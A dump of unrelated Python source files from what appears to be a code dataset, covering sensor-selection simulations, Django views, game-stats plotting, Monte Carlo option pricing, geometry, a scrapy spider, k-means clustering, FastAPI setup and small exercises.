def SensSelecModel(N, d, capacity, mu, partitionsArea , allPossibleSets, rectangleLength, rectangleWidth, sensorRadius, scalingFactor, lam, areaR, thresh = 2.):
areaWeightedAge = 0.
coverageArea = np.sum(partitionsArea)
numSelectedSensors = N
setofSelectedSensors = []
setofSensors = np.arange(1,N+1,1)
k = 4.
#np.ceil((rectangleLength/sensorRadius)*1.) - 5.
if int(N)>int(k):
numSelectedSensors = (k)
ratePerSensor = capacity/(numSelectedSensors*mu*d)
#lam = d*(1.+1./2.*numSelectedSensors)
new_max = 0.
temp_b_old = 0.
for ii in range(int(numSelectedSensors)):
b_old = temp_b_old
new_max = 0.
for jj in range(N):
if jj+1 not in setofSelectedSensors:
b_new, tempcoverageArea, tempareaWeightedAge, selectedPartitionsArea = compute_b(N, d, mu, partitionsArea, setofSelectedSensors, setofSensors, ratePerSensor, jj+1, allPossibleSets, areaR, lam)
if np.abs(b_new - b_old) >= new_max:
new_max = (b_new - b_old)
temp_b_old = b_new
selectedSensor = jj+1
coverageArea = tempcoverageArea
areaWeightedAge = tempareaWeightedAge
setofSelectedSensors.append(selectedSensor)
#setofSelectedSensors = np.sort(setofSelectedSensors)
return coverageArea , areaWeightedAge/(coverageArea) , setofSelectedSensors
def AgeMinModel(N, d, mu, capacity , partitionsArea , allPossibleSets, rectangleLength , rectangleWidth , sensorRadius, scalingFactor , T, lam, thresh = 2.):
areaWeightedAge = 0.
coverageArea = np.sum(partitionsArea)
numSelectedSensors = N
setofSelectedSensors = []
setofSensors = np.arange(1,N+1,1)
k = 4.
#np.ceil((rectangleLength/sensorRadius)*1.)
if int(N)>int(k):
numSelectedSensors = int(k)
ratePerSensor = capacity/(numSelectedSensors*mu*d)
#lam = d*(1.+1./2.*numSelectedSensors)
new_max = 0.
temp_b_old = 0.
for ii in range(int(numSelectedSensors)):
b_old = temp_b_old
new_max = 0.
for jj in range(N):
if jj+1 not in setofSelectedSensors:
b_new, tempcoverageArea , tempareaWeightedAge,selectedPartitionsArea = compute_b(N, d ,mu, partitionsArea, setofSelectedSensors, setofSensors ,ratePerSensor, jj+1, allPossibleSets, lam)
if np.abs(b_new - b_old) >= new_max:
new_max = (b_new - b_old)
temp_b_old = b_new
selectedSensor = jj+1
coverageArea = tempcoverageArea
areaWeightedAge = tempareaWeightedAge
setofSelectedSensors.append(selectedSensor)
setofSelectedSensors = np.sort(setofSelectedSensors)
newallPossibleSets = []
for ii in range(1,int(numSelectedSensors)+1):
hello = findsubsets(setofSelectedSensors,ii)
#hello1 = (np.asarray(hello))
for jj in range(len(hello)):
newallPossibleSets.append(list(hello[jj]))
newselectedPartitionsArea = np.zeros(2**(numSelectedSensors)-1)
for ii in range(len(allPossibleSets)):
temp = []
for jj in range(len(allPossibleSets[ii])):
if allPossibleSets[ii][jj] in setofSelectedSensors:
temp.append(allPossibleSets[ii][jj])
if temp:
#temp = np.sort(temp)
idx = newallPossibleSets.index(temp)
newselectedPartitionsArea[idx] = newselectedPartitionsArea[idx] + partitionsArea[ii]
# Compute new rate allocation and new ageWeightedArea
rate_fw_agemin, obj_fn, l1_fw_agemin = descent(N,frank_wolfe, d, numSelectedSensors, setofSelectedSensors, newallPossibleSets, np.array(newselectedPartitionsArea), capacity/(mu*d), T=T)
return coverageArea, obj_fn[-1], setofSelectedSensors
##################################################################
def main(T=int(5e2)):
scalingFactor = 50
N = np.arange(14,19,1) # number of sensors
num_samples_per_sensor_sub = 5000
num_samples_per_sensor = 3000
lam = 1.
sensorRadius = np.array(100/scalingFactor)#coverage radius per sensor
#sensorRadius = []
#sensorRadius = np.array([1.,1.,1.,1.,1.,2.,2.,2.,2.,2.])
capacity = 1.
d = 0.5e-3 #transmission delay
mu = 1. #packet size
rectangleLength = 500/scalingFactor
rectangleWidth = 10/scalingFactor
areaR = rectangleLength*rectangleWidth*scalingFactor**2
numSquaresperLength = int(rectangleLength*10)
numSquaresperWidth = int(rectangleWidth*10)
pixelLength = rectangleLength/numSquaresperLength
pixelWidth = rectangleWidth/numSquaresperWidth
xPosCenterPixel1 = pixelLength/2
yPosCenterPixel1 = pixelWidth/2
coordPixels = generatePixelsCenters(xPosCenterPixel1, yPosCenterPixel1, pixelLength, pixelWidth, numSquaresperLength, numSquaresperWidth)
# the coordinates of the box are: x_min, x_max, y_min, y_max
coordBox = np.array([0.,rectangleLength,0.,rectangleWidth])
coverageAreaBaseline = []
areaWeightedAgeBaseline = []
totalTimeBaseline = []
coverageAreaSensSelec = []
areaWeightedAgeSensSelec = []
selectedSensorsSensSelec = []
totalTimeSensSelec = []
coverageAreaAgeMin = []
areaWeightedAgeAgeMin =[]
selectedSensorsAgeMin =[]
newcoverageAreaBaseline = []
newareaWeightedAgeBaseline = []
newtotalTimeBaseline = []
newcoverageAreaSensSelec = []
newareaWeightedAgeSensSelec = []
newselectedSensorsSensSelec = []
newtotalTimeSensSelec = []
newcoverageAreaAgeMin = []
newareaWeightedAgeAgeMin =[]
newselectedSensorsAgeMin =[]
numIter = 15
for ii in tqdm(range(len(N))):
temp1coverageAreaBaseline = []
temp1areaWeightedAgeBaseline = []
temp1TotalTimeBaseline = []
temp1coverageAreaSensSelec = []
temp1areaWeightedAgeSensSelec = []
temp1selectedSensorsSensSelec = []
temp1TotalTimeSensSelec = []
temp1coverageAreaAgeMin = []
temp1areaWeightedAgeAgeMin =[]
temp1selectedSensorsAgeMin =[]
for jj in range(numIter):
xcoordSensors = 0 + np.random.rand(N[ii],1)*(rectangleLength-0)
ycoordSensors = 0 + np.random.rand(N[ii],1)*(rectangleWidth-0)
coordSensors = np.concatenate((xcoordSensors,ycoordSensors),axis=1)
startTimeFindPartitions = time.time()
partitionsArea , allPossibleSets = findPartitionsAreas(pixelLength, pixelWidth, coordPixels,coordSensors,sensorRadius,N[ii])
endTimeFindPartitions = time.time()
startTimeBaseline = time.time()
tempcoverageAreaBaseline , tempareaWeightedAgeBaseline = baselineModel(capacity/(N[ii]*mu*d), d, partitionsArea*scalingFactor**2 , allPossibleSets, scalingFactor)
endTimeBaseline = time.time()
startTimeSensSelec = time.time()
tempcoverageAreaSensSelec , tempareaWeightedAgeSensSelec , tempselectedSensorsSensSelec = SensSelecModel(N[ii], d, capacity , mu, partitionsArea*scalingFactor**2 , allPossibleSets, rectangleLength*scalingFactor, rectangleWidth*scalingFactor , sensorRadius*scalingFactor, scalingFactor, lam, areaR, thresh = 2.)
endTimeSensSelec = time.time()
# tempcoverageAreaAgeMin , tempareaWeightedAgeAgeMin , tempselectedSensorsAgeMin = AgeMinModel(N[ii], d, mu, capacity , partitionsArea*scalingFactor**2 , allPossibleSets, rectangleLength*scalingFactor , rectangleWidth*scalingFactor , sensorRadius*scalingFactor, scalingFactor, T, lam ,thresh = 2.)
temp1coverageAreaBaseline.append(tempcoverageAreaBaseline)
temp1areaWeightedAgeBaseline.append(tempareaWeightedAgeBaseline)
temp1TotalTimeBaseline.append((endTimeFindPartitions-startTimeFindPartitions)+(endTimeBaseline-startTimeBaseline))
temp1coverageAreaSensSelec.append(tempcoverageAreaSensSelec)
temp1areaWeightedAgeSensSelec.append(tempareaWeightedAgeSensSelec)
temp1selectedSensorsSensSelec.append(len(tempselectedSensorsSensSelec))
temp1TotalTimeSensSelec.append((endTimeFindPartitions-startTimeFindPartitions)+(endTimeSensSelec-startTimeSensSelec))
# temp1coverageAreaAgeMin.append(tempcoverageAreaAgeMin)
# temp1areaWeightedAgeAgeMin.append(tempareaWeightedAgeAgeMin)
# temp1selectedSensorsAgeMin.append(len(tempselectedSensorsAgeMin))
coverageAreaBaseline.append(np.sum(temp1coverageAreaBaseline)/numIter/areaR*100)
areaWeightedAgeBaseline.append(np.sum(temp1areaWeightedAgeBaseline)/numIter*1000.)
totalTimeBaseline.append(np.sum(temp1TotalTimeBaseline)/numIter)
coverageAreaSensSelec.append(np.sum(temp1coverageAreaSensSelec)/numIter/areaR*100)
areaWeightedAgeSensSelec.append(np.sum(temp1areaWeightedAgeSensSelec)/numIter*1000.)
selectedSensorsSensSelec.append(np.sum(temp1selectedSensorsSensSelec)/numIter)
totalTimeSensSelec.append(np.sum(temp1TotalTimeSensSelec)/numIter)
# coverageAreaAgeMin.append(np.sum(temp1coverageAreaAgeMin)/numIter/areaR)
# areaWeightedAgeAgeMin.append(np.sum(temp1areaWeightedAgeAgeMin)/numIter*1000.)
# selectedSensorsAgeMin.append(np.sum(temp1selectedSensorsAgeMin)/numIter)
for ii in tqdm(range(len(N))):
temp1coverageAreaBaseline = []
temp1areaWeightedAgeBaseline = []
temp1TotalTimeBaseline = []
temp1coverageAreaSensSelec = []
temp1areaWeightedAgeSensSelec = []
temp1selectedSensorsSensSelec = []
temp1TotalTimeSensSel = []
temp1coverageAreaAgeMin = []
temp1areaWeightedAgeAgeMin =[]
temp1selectedSensorsAgeMin =[]
for jj in range(numIter):
xcoordSensors = 0 + np.random.rand(N[ii],1)*(rectangleLength-0)
ycoordSensors = 0 + np.random.rand(N[ii],1)*(rectangleWidth-0)
coordSensors = np.concatenate((xcoordSensors,ycoordSensors),axis=1)
startTimeBaseline = time.time()
tempcoverageAreaBaseline , tempareaWeightedAgeBaseline = newbaselineModel(capacity, mu, N[ii], d, coordSensors, sensorRadius, coordBox, num_samples_per_sensor, scalingFactor)
endTimeBaseline = time.time()
startTimeSensSelec = time.time()
tempcoverageAreaSensSelec, tempareaWeightedAgeSensSelec, tempselectedSensorsSensSelec = newSensSelecModel(N[ii], d, capacity , mu, coordSensors, sensorRadius, coordBox, num_samples_per_sensor_sub, num_samples_per_sensor, scalingFactor, lam, areaR, thresh = 2.)
endTimeSensSelec = time.time()
#tempcoverageAreaAgeMin , tempareaWeightedAgeAgeMin , tempselectedSensorsAgeMin = AgeMinModel(N[ii], d, mu, capacity , partitionsArea*scalingFactor**2 , allPossibleSets, rectangleLength*scalingFactor , rectangleWidth*scalingFactor , sensorRadius*scalingFactor, scalingFactor, T, lam ,thresh = 2.)
temp1coverageAreaBaseline.append(tempcoverageAreaBaseline)
temp1areaWeightedAgeBaseline.append(tempareaWeightedAgeBaseline)
temp1TotalTimeBaseline.append(endTimeBaseline-startTimeBaseline)
temp1coverageAreaSensSelec.append(tempcoverageAreaSensSelec)
temp1areaWeightedAgeSensSelec.append(tempareaWeightedAgeSensSelec)
temp1selectedSensorsSensSelec.append(len(tempselectedSensorsSensSelec))
temp1TotalTimeSensSelec.append(endTimeSensSelec-startTimeSensSelec)
# temp1coverageAreaAgeMin.append(tempcoverageAreaAgeMin)
# temp1areaWeightedAgeAgeMin.append(tempareaWeightedAgeAgeMin)
# temp1selectedSensorsAgeMin.append(len(tempselectedSensorsAgeMin))
newcoverageAreaBaseline.append(np.sum(temp1coverageAreaBaseline)/numIter/areaR*100)
newareaWeightedAgeBaseline.append(np.sum(temp1areaWeightedAgeBaseline)/numIter*1000.)
newtotalTimeBaseline.append(np.sum(temp1TotalTimeBaseline)/numIter)
newcoverageAreaSensSelec.append(np.sum(temp1coverageAreaSensSelec)/numIter/areaR*100)
newareaWeightedAgeSensSelec.append(np.sum(temp1areaWeightedAgeSensSelec)/numIter*1000.)
newselectedSensorsSensSelec.append(np.sum(temp1selectedSensorsSensSelec)/numIter)
newtotalTimeSensSelec.append(np.sum(temp1TotalTimeSensSelec)/numIter)
#
# newcoverageAreaAgeMin.append(np.sum(temp1coverageAreaAgeMin)/numIter/areaR)
# newareaWeightedAgeAgeMin.append(np.sum(temp1areaWeightedAgeAgeMin)/numIter*1000.)
# newselectedSensorsAgeMin.append(np.sum(temp1selectedSensorsAgeMin)/numIter)
plt.clf()
plt.plot(N , areaWeightedAgeBaseline, 'b' , label='Baseline')
plt.plot(N , newareaWeightedAgeBaseline, 'b--', label='Sampling Baseline')
plt.plot(N , areaWeightedAgeSensSelec, 'r',label='Sensor Selection')
plt.plot(N , newareaWeightedAgeSensSelec, 'r--',label='Sampling Sensor Selection')
#plt.plot(N , areaWeightedAgeAgeMin, label='Age Minimization')
#plt.title('Area weighted age as a function of the number of selected sensors', fontsize=12)
plt.legend()
plt.grid()
#plt.yscale('log')
plt.xlabel('Number of available sensors N', fontsize=12)
plt.ylabel('Normalized average weighted age [msec]', fontsize=10)
plt.savefig('oldSampledAge_N=14_19.eps')
plt.savefig('oldSampledAge_N=14_19.pdf')
plt.clf()
plt.plot(N , coverageAreaBaseline, 'b', label='Baseline')
plt.plot(N , newcoverageAreaBaseline, 'b--', label='Sampling Baseline')
plt.plot(N , coverageAreaSensSelec, 'r',label='Sensor Selection')
plt.plot(N , newcoverageAreaSensSelec, 'r--',label='Sampling Sensor Selection')
#plt.plot(N , coverageAreaAgeMin, label='Age Minimization')
#plt.title('Coverage Area as a function of the number of selected sensors', fontsize=12)
plt.legend()
plt.grid()
plt.xlabel('Number of available sensors N', fontsize=12)
plt.ylabel('Coverage Area [%]', fontsize=10)
plt.savefig('oldSampledCov_N=14_19.eps')
plt.savefig('oldSampledCov_N=14_19.pdf')
plt.clf()
plt.plot(N , totalTimeBaseline, 'b', label='Baseline')
plt.plot(N , newtotalTimeBaseline, 'b--', label='Sampling Baseline')
plt.plot(N , totalTimeSensSelec, 'r',label='Sensor Selection')
plt.plot(N , newtotalTimeSensSelec, 'r--',label='Sampling Sensor Selection')
#plt.plot(N , coverageAreaAgeMin, label='Age Minimization')
plt.legend()
plt.grid()
plt.xlabel('Number of available sensors N', fontsize=12)
plt.ylabel('Algorithm running time [sec]', fontsize=10)
plt.savefig('oldSampledAlgoRunTime_N=14_19.eps')
plt.savefig('oldSampledAlgoRunTime_N=14_19.pdf')
if __name__ == "__main__":
main() |
23,122 | 83a14fab96476430b9fa5c120a7332e8008363ce | from django.shortcuts import render
from django.views import generic
from .models import *
from Services.models import ServiceItems
# Create your views here.
class Cases(generic.TemplateView):
template_name = "Cases/index.html"
def get_context_data(self, **kwargs):
context = {}
case_categoryes = CaseCategory.objects.all()
cases = CaseItems.objects.all().order_by('-created')
context['case_categoryes'] = case_categoryes
context['cases'] = cases
return context
class single_case(generic.DetailView):
template_name = "Cases/single-case.html"
cases = CaseItems.objects.all().order_by('-created')
model = CaseItems
context_object_name = 'case'
initial = {'key': 'value'}
def get_context_data(self, **kwargs):
center_services = ServiceItems.objects.order_by('-id')[:3]
related_cases = CaseItems.objects.all().order_by('-created')[:3]
context = super(single_case, self).get_context_data(**kwargs)
context['related_cases'] = related_cases
context['center_services'] = center_services
return context |
23,123 | ead3891524defcbe8f010ebd3ef868a852927c94 |
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import json
epsraw = np.loadtxt('eps.txt',delimiter=',')
gpsraw = np.loadtxt('gps.txt',delimiter=',')
prsraw = np.loadtxt('prs.txt',delimiter=',')
with open('players.txt', 'r') as playersfile :
players = json.load(playersfile)
# find classes
druidids = []
hunterids = []
mageids = []
paladinids = []
priestids = []
rogueids = []
shamanids = []
warlockids = []
warriorids = []
for player in players :
if player['class'] == 'druid' :
druidids.append(player['id'])
elif player['class'] == 'hunter' :
hunterids.append(player['id'])
elif player['class'] == 'mage' :
mageids.append(player['id'])
elif player['class'] == 'paladin' :
paladinids.append(player['id'])
elif player['class'] == 'priest' :
priestids.append(player['id'])
elif player['class'] == 'rogue' :
rogueids.append(player['id'])
elif player['class'] == 'shaman' :
shamanids.append(player['id'])
elif player['class'] == 'warlock' :
warlockids.append(player['id'])
elif player['class'] == 'warrior' :
warriorids.append(player['id'])
druidprs = []
hunterprs = []
mageprs = []
paladinprs = []
priestprs = []
rogueprs = []
shamanprs = []
warlockprs = []
warriorprs = []
for druidid in druidids :
subprs = []
for run in prsraw :
subprs.append(run[druidid])
druidprs.append(subprs)
for hunterid in hunterids :
subprs = []
for run in prsraw :
subprs.append(run[hunterid])
hunterprs.append(subprs)
for mageid in mageids :
subprs = []
for run in prsraw :
subprs.append(run[mageid])
mageprs.append(subprs)
for paladinid in paladinids :
subprs = []
for run in prsraw :
subprs.append(run[paladinid])
paladinprs.append(subprs)
for priestid in priestids :
subprs = []
for run in prsraw :
subprs.append(run[priestid])
priestprs.append(subprs)
for rogueid in rogueids :
subprs = []
for run in prsraw :
subprs.append(run[rogueid])
rogueprs.append(subprs)
for shamanid in shamanids :
subprs = []
for run in prsraw :
subprs.append(run[shamanid])
shamanprs.append(subprs)
for warlockid in warlockids :
subprs = []
for run in prsraw :
subprs.append(run[warlockid])
warlockprs.append(subprs)
for warriorid in warriorids :
subprs = []
for run in prsraw :
subprs.append(run[warriorid])
warriorprs.append(subprs)
print (hunterprs)
figdruids, ax = plt.subplots()
for prdata in druidprs :
ax.plot(prdata)
ax.set_ylim([0,20])
fighunters, ax = plt.subplots()
for prdata in hunterprs :
ax.plot(prdata)
ax.set_ylim([0,20])
figmages, ax = plt.subplots()
for prdata in mageprs :
ax.plot(prdata)
ax.set_ylim([0,20])
figpaladins, ax = plt.subplots()
for prdata in paladinprs :
ax.plot(prdata)
ax.set_ylim([0,20])
figpriests, ax = plt.subplots()
for prdata in priestprs :
ax.plot(prdata)
ax.set_ylim([0,20])
figrogues, ax = plt.subplots()
for prdata in rogueprs :
ax.plot(prdata)
ax.set_ylim([0,20])
figshamans, ax = plt.subplots()
for prdata in shamanprs :
ax.plot(prdata)
ax.set_ylim([0,20])
figwarlocks, ax = plt.subplots()
for prdata in warlockprs :
ax.plot(prdata)
ax.set_ylim([0,20])
figwarriors, ax = plt.subplots()
for prdata in warriorprs :
ax.plot(prdata)
ax.set_ylim([0,20])
figdruids.savefig('./graphics/druids.png')
fighunters.savefig('./graphics/mages.png')
fighunters.savefig('./graphics/hunters.png')
figpaladins.savefig('./graphics/paladins.png')
figpriests.savefig('./graphics/priests.png')
figrogues.savefig('./graphics/rogues.png')
figshamans.savefig('./graphics/shamans.png')
figwarlocks.savefig('./graphics/warlocks.png')
figwarriors.savefig('./graphics/warriors.png')
|
23,124 | 2f9fdbf375bfd2b8f48fb998532199bbf04f8ab4 | # You can choose to import only parts from a module, by using the from keyword.
# The module named mymodule has one function and one dictionary:
# Import only the person1 dictionary from the module:
from mymodule import person1
print(person1["age"])
|
23,125 | cd1c7ef278698fedf01ee13d2c5db00fb8bfe72f | import numpy as np
import numpy.random as npr
M = 50
I = 10000
sigma = 0.25
def standard_normal_dist(M, I, anti_paths=True, mo_match=True):
if anti_paths is True:
sn = npr.standard_normal((M + 1, int(I / 2)))
sn = np.concatenate((sn, -sn), axis=1)
else:
sn = npr.standard_normal((M + 1, I))
if mo_match is True:
sn = (sn - sn.mean()) / sn.std()
return sn
def monte_carlo_brownian_motion(S0, K, r, T, option_type):
dt = T / M
S = np.zeros((M + 1, I))
S[0] = S0
sn = standard_normal_dist(M, I)
for t in range(1, M + 1):
S[t] = S[t - 1] * np.exp((r - 0.5 * sigma ** 2) * dt + sigma * np.sqrt(dt) * sn[t])
if option_type.lower() == 'call':
hT = np.maximum(S[-1] - K, 0)
else:
hT = np.maximum(K - S[-1], 0)
C0 = np.exp(-r * T) * np.mean(hT)
return option_type + ' option value: ' + str(C0)
parameters = {}
try:
S0 = float(input('Initial Price of an underlying product(example 100): '))
parameters['Initial Price'] = S0
except:
S0 = 'ERROR'
print('ERROR: Input value needs to be a number')
parameters['Initial Price'] = S0
try:
K = float(input('Strike price(example 120): '))
parameters['Strike Price'] = K
except:
K = 'ERROR'
print('ERROR: Input value needs to be a number')
parameters['Strike Price'] = K
try:
r = float(input('Risk Free Interest Rate(example 0.05): '))
parameters['Risk Free Interest Rate'] = r
except:
r = 'ERROR'
print('ERROR: Input value needs to be a number')
parameters['Risk Free Interest Rate'] = r
try:
T = float(input('Time Horizon in years(example 2): '))
parameters['Time Horizon'] = T
except:
T = 'ERROR'
print('ERROR: Input value needs to be a number')
parameters['Time Horizon'] = T
option_type = str(input('Call[Yes]/Put[No](example Yes): '))
if option_type.lower() == 'yes':
option_type = 'call'
parameters['Option Type'] = option_type
elif option_type.lower() == 'no':
option_type = 'put'
parameters['Option Type'] = option_type
else:
option_type = 'ERROR'
print('ERROR: Choose either Yes or No')
parameters['Option Type'] = option_type
def compute():
if 'ERROR' in parameters.values():
return
else:
print('\n' + 'Option Valuation with following parameters:')
for k, v in parameters.items():
print(k + ':', v)
print('\n' + monte_carlo_brownian_motion(S0, K, r, T, option_type))
compute()
|
23,126 | 0c9fd192c103a638e3b114357dfd5c3a7d9ca116 | import dataclasses
from datetime import datetime
from enum import Enum
from enum import auto
from typing import Any
from typing import List
from typing import Optional
import dateutil.parser
from sora.utils import from_bool
from sora.utils import from_datetime
from sora.utils import from_int
from sora.utils import from_str
from sora.utils import to_class
@dataclasses.dataclass(frozen=True)
class WorkId:
""" APIで管理するアニメ作品に割り当てられているユニークなID """
value: int
def __post_init__(self) -> None:
from_int(self.value)
@dataclasses.dataclass(frozen=True)
class Title:
""" アニメ作品名 """
value: str
def __post_init__(self) -> None:
from_str(self.value)
@dataclasses.dataclass(frozen=True)
class WorkLight:
work_id: WorkId
title: Title
def to_dict(self) -> dict:
return {
"id": dataclasses.asdict(self.work_id)["value"],
"title": dataclasses.asdict(self.title)["value"],
}
@staticmethod
def from_dict(work_light_dict: dict) -> "WorkLight":
assert isinstance(work_light_dict, dict)
return WorkLight(
WorkId(work_light_dict.get("id")),
Title(work_light_dict.get("title")),
)
@dataclasses.dataclass
class MultiWorkLight:
_list: List[WorkLight] = dataclasses.field(default_factory=list)
def append(self, work_light: WorkLight) -> None:
if isinstance(work_light, WorkLight):
self._list.append(work_light)
else:
raise TypeError("data is not work_light")
def to_dict(self) -> list:
return [work_light.to_dict() for work_light in self._list]
|
23,127 | 9570163a132b3a42fed6dcd3af440737276d57bc | #!/usr/bin/python
# -*- coding: utf-8 -*-
import csv
import math
from scipy.integrate import quad
def ellipseArea(a, b, angle):
area = 0
quarters = 0
while angle > math.pi / 2:
area += a * b * math.pi / 4
angle -= math.pi / 2
quarters += 1
if quarters % 2 == 0: # starts at a vertical edge
area += a * b * math.pi / 4 - \
.5 * a * b * math.atan(a * math.tan(math.pi / 2 - angle) / b)
else: # starts at horizontal edge
area += .5 * a * b * math.atan(a * math.tan(angle) / b)
return area
# Function to integrate from 0 to 2π to get ellipse perimeter
def ellipseArcFunction(t, params):
a, b = params
return math.sqrt(a*a * math.sin(t)*math.sin(t) + b*b * math.cos(t)*math.cos(t))
def ellipseArc(a, b, angle):
length, err = quad(ellipseArcFunction, 0, angle, [a, b])
return length
# Calculate arc length and area for ellipse for a given slice defined by its central angle and rotation
def calcEllipse(a, b, angle, rotation):
area = ellipseArea(a, b, angle+rotation) - ellipseArea(a, b, rotation)
arc = ellipseArc(a, b, angle+rotation) - ellipseArc(a, b, rotation)
return [arc, area]
# Calculate the projected angles for a circle tilted at viewAngle from the viewer
# Returns the projected centralAngle and projected rotationAngle
def projectAngle(viewAngle, centralAngle, rotationAngle):
xA = math.cos(rotationAngle)
yA = math.sin(rotationAngle)
xB = math.cos(rotationAngle+centralAngle)
yB = math.sin(rotationAngle+centralAngle)
yAProj = yA*math.sin(viewAngle)
yBProj = yB*math.sin(viewAngle)
rotationProj = math.atan2(yAProj, xA)
centralProj = math.atan2(yBProj, xB) - rotationProj
# Avoid the π to -π discontinuity when we cross the negative x axis (also keep angles in [0..2π])
if rotationProj < 0:
rotationProj += math.pi*2
if centralProj < 0:
centralProj += math.pi*2
return [centralProj, rotationProj]
def main():
with open('3dpiepredictions.csv', 'wb') as outFile:
csvOut = csv.writer(outFile)
csvOut.writerow(['viewAngle', 'aspect', 'rotation', 'rotationProjected', 'angle', 'angleProjected', 'arc', 'area'])
for viewAngle in range(90, 10, -15):
viewRadians = math.radians(viewAngle)
aspect = math.sin(viewRadians)
a = 1.
b = aspect
ellipseTotal = calcEllipse(a, b, math.pi*2, 0)
for centralAngle in [5, 10, 20, 30, 45, 60, 75, 90, 135, 180]:
centralRadians = math.radians(centralAngle)
for rotation in range(360):
angleProjected, rotationProjected = projectAngle(viewRadians, centralRadians, math.radians(rotation))
ellipse = calcEllipse(a, b, angleProjected, rotationProjected)
csvOut.writerow([viewAngle, aspect, rotation, math.degrees(rotationProjected), centralAngle, math.degrees(angleProjected), ellipse[0]/ellipseTotal[0], ellipse[1]/ellipseTotal[1]])
if __name__ == "__main__":
# This will be called only when the Python file is invoked as a script.
main()
|
23,128 | 08001ab43936a8c7bd57d274b6ff8f874598fde6 | text = "X-DSPAM-Confidence: 0.8475";
whiteSpace = text.find(' ')
endNum = text.find('5', whiteSpace)
withSpace = text[whiteSpace + 1 : endNum + 1]
removeSpace = withSpace.strip()
floatStr = float(removeSpace)
print(floatStr)
|
23,129 | 721a4291b22de323b902a9b59ec911a4d78d807b | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import multiprocessing as mp
import time
import kmeans_par
import kmeans_seq
from itertools import repeat
# print("Number of processors: ", mp.cpu_count())
# generate test data
numIter = 10
# n = 2000
# cluster1 = np.random.randn(n, 2) + [0, 0]
# cluster2 = np.random.randn(n, 2) + [0, 7.5]
# cluster3 = np.random.randn(n, 2) + [7.5, 0]
# cluster4 = np.random.randn(n, 2) + [7.5, 7.5]
#
# data = np.concatenate((cluster1, cluster2, cluster3, cluster4))
data = np.load('clusteringData2000.npy')
data = pd.DataFrame(data)
numFeatures = data.shape[1]
numPoints = data.shape[0]
"""Initialize centroids randomly"""
numCentroids = 4
centroids = np.array(data.sample(n=numCentroids))
centroids_seq = centroids.copy()
centroids_pool = centroids.copy()
"""Plot initial data and centroids"""
data.plot.scatter(x=0, y=1)
plt.scatter(x=[0, 0, 7.5, 7.5], y=[0, 7.5, 0, 7.5], c='r', marker='+', s=100)
# plt.scatter(x=centroids[:, 0], y=centroids[:, 1], c='r', marker='+', s=100)
plt.show()
dist = np.ndarray((data.shape[0], numCentroids))
""" Initialise Global Error"""
GlobalError =100.0
Num_iterations=0
start_par = time.time()
print('Running Sequential K Means')
""""Sequential implementation"""
start_seq = time.time()
while GlobalError > 0.0001:
start_time = time.time()
temp_centroids=centroids_seq.copy()
centroid_assignments_seq = kmeans_seq.assign_centroid(data, centroids_seq)
elapsed_part1 = (time.time() - start_time)
# kmeans_seq.plot_clusters(data, centroid_assignments_seq, centroids_seq, title='Seq '+str(iteration))
start_time = time.time()
centroids_seq = kmeans_seq.update_centroids(data, centroid_assignments_seq, numCentroids, numFeatures)
GlobalError=kmeans_seq.update_global_error(temp_centroids, centroids_seq)
Num_iterations=Num_iterations+1
elapsed_part2 = (time.time() - start_time)
elapsed_seq = (time.time() - start_seq)
kmeans_seq.plot_clusters(data, centroid_assignments_seq, centroids_seq, title='K Means Seq')
print('--------------------')
# print('pool time:', elapsed_pool)
print('sequential time:', elapsed_seq)
print('Number of iterations',Num_iterations)
print('Global Error', GlobalError)
|
23,130 | cf617033c808522a4c7eba3d3616065b6e6d1d3a | from fastapi import FastAPI, Depends, status, Response, HTTPException
import schemas
import models
from database import engine, SessionLocal, get_db
from sqlalchemy.orm import Session
from typing import List
from hashing import Hash
from routers import blog, user, authentication
app = FastAPI()
models.Base.metadata.create_all(engine)
app.include_router(blog.router)
app.include_router(user.router)
app.include_router(authentication.router)
|
23,131 | e89ffbf0b92d82f7a84d53436a17926c308261f8 | # -*- coding: utf-8 -*-
import scrapy
import re
from scrapy_demo3.items import NESAItem
class NesaSpider(scrapy.Spider):
name = 'nesa'
allowed_domains = ['nesa.zju.edu.cn']
start_urls = ['http://nesa.zju.edu.cn/webpage/people.html']
def parse(self, response):
person_list = response.xpath('//div[@class="view view-ninth"]')
for person in person_list:
item = NESAItem()
name = person.xpath('.//h2/text()').extract_first()
position = person.xpath('.//p/text()').extract_first()
img_src = person.xpath('.//img/@src').extract_first()
img_src = re.sub(r'\.\./', r'http://nesa.zju.edu.cn', img_src)
item['name'] = name
item['position'] = position
item['img_src'] = img_src
yield item
|
23,132 | 9d852bed40bb61a96e5acdd9b711f9bc8c1bc1da | import timeit
res = timeit.repeat(
'''
n = 999999998
if n == 1:
print(1)
exit()
def factor_dict(n):
d={}
sqrtN = int(pow(n, 0.5)) + 1
for i in range(2, sqrtN):
while not n % i:
if i in d: d[i] += 1
else: d[i] = 1
n //= i
if n != 1:
d[n] = 1
return d
factor_n = factor_dict(n)
sqrtN = int(pow(n, 0.5)) + 1
maxDiv = max(factor_n.keys())
for i in range(maxDiv, 10 ** 9, maxDiv):
factor_cur = factor_dict(i)
for k in factor_cur:
factor_cur[k] *= i
for k in factor_n:
if k not in factor_cur:
factor_cur[k] = 0
for k in factor_n:
factor_cur[k] -= factor_n[k]
len_f_c = len(factor_cur)
am = 0
for k in factor_cur:
if factor_cur[k] >= 0: am += 1
if am == len_f_c:
print(i)
break
'''
, number=1, repeat=3)
print(res) |
23,133 | 4d5632b5957264b9adeb2afb95d2b30cdfe918b8 | from sklearn import tree
#Training Data
features = [[140,1],[130,1],[150,0],[170,1]]#0 for bumpy, 1 for smooth
labels = [0,0,1,1] #0 for apple , 1 for orange
clf = tree.DecisionTreeClassifier()
clf = clf.fit(features,labels)
print(clf.predict([[150,0]]))
|
23,134 | 2dbd5b95c7a8bd3ca1c68a7279f7adc9a762e6b3 |
class Car:
def __init__(self, speed=0, gear=1, color="white", fuelratio=0):
self.__speed = speed
self.__gear = gear
self.__color = color
self.__fuelratio = fuelratio
def setSpeed(self, speed):
self.__speed = speed;
def setGear(self, gear):
self.__gear = gear;
def setColor(self, color):
self.__color = color;
def setFuelratio(self, fuelratio):
self.__fuelratio = fuelratio;
def __str__(self):
return '(%d, %d, %s, %d)' %(self.__speed, self.__gear, self.__color, self.__fuelratio)
def calcFuel(self, distance):
self.__distance = distance
return self.__distance / self.__fuelratio
myCar = Car()
myCar.setSpeed(3);
myCar.setGear(100);
myCar.setColor('Black')
myCar.setFuelratio(10)
print(myCar, " 사용하는 연료량은", myCar.calcFuel(100),"임")
|
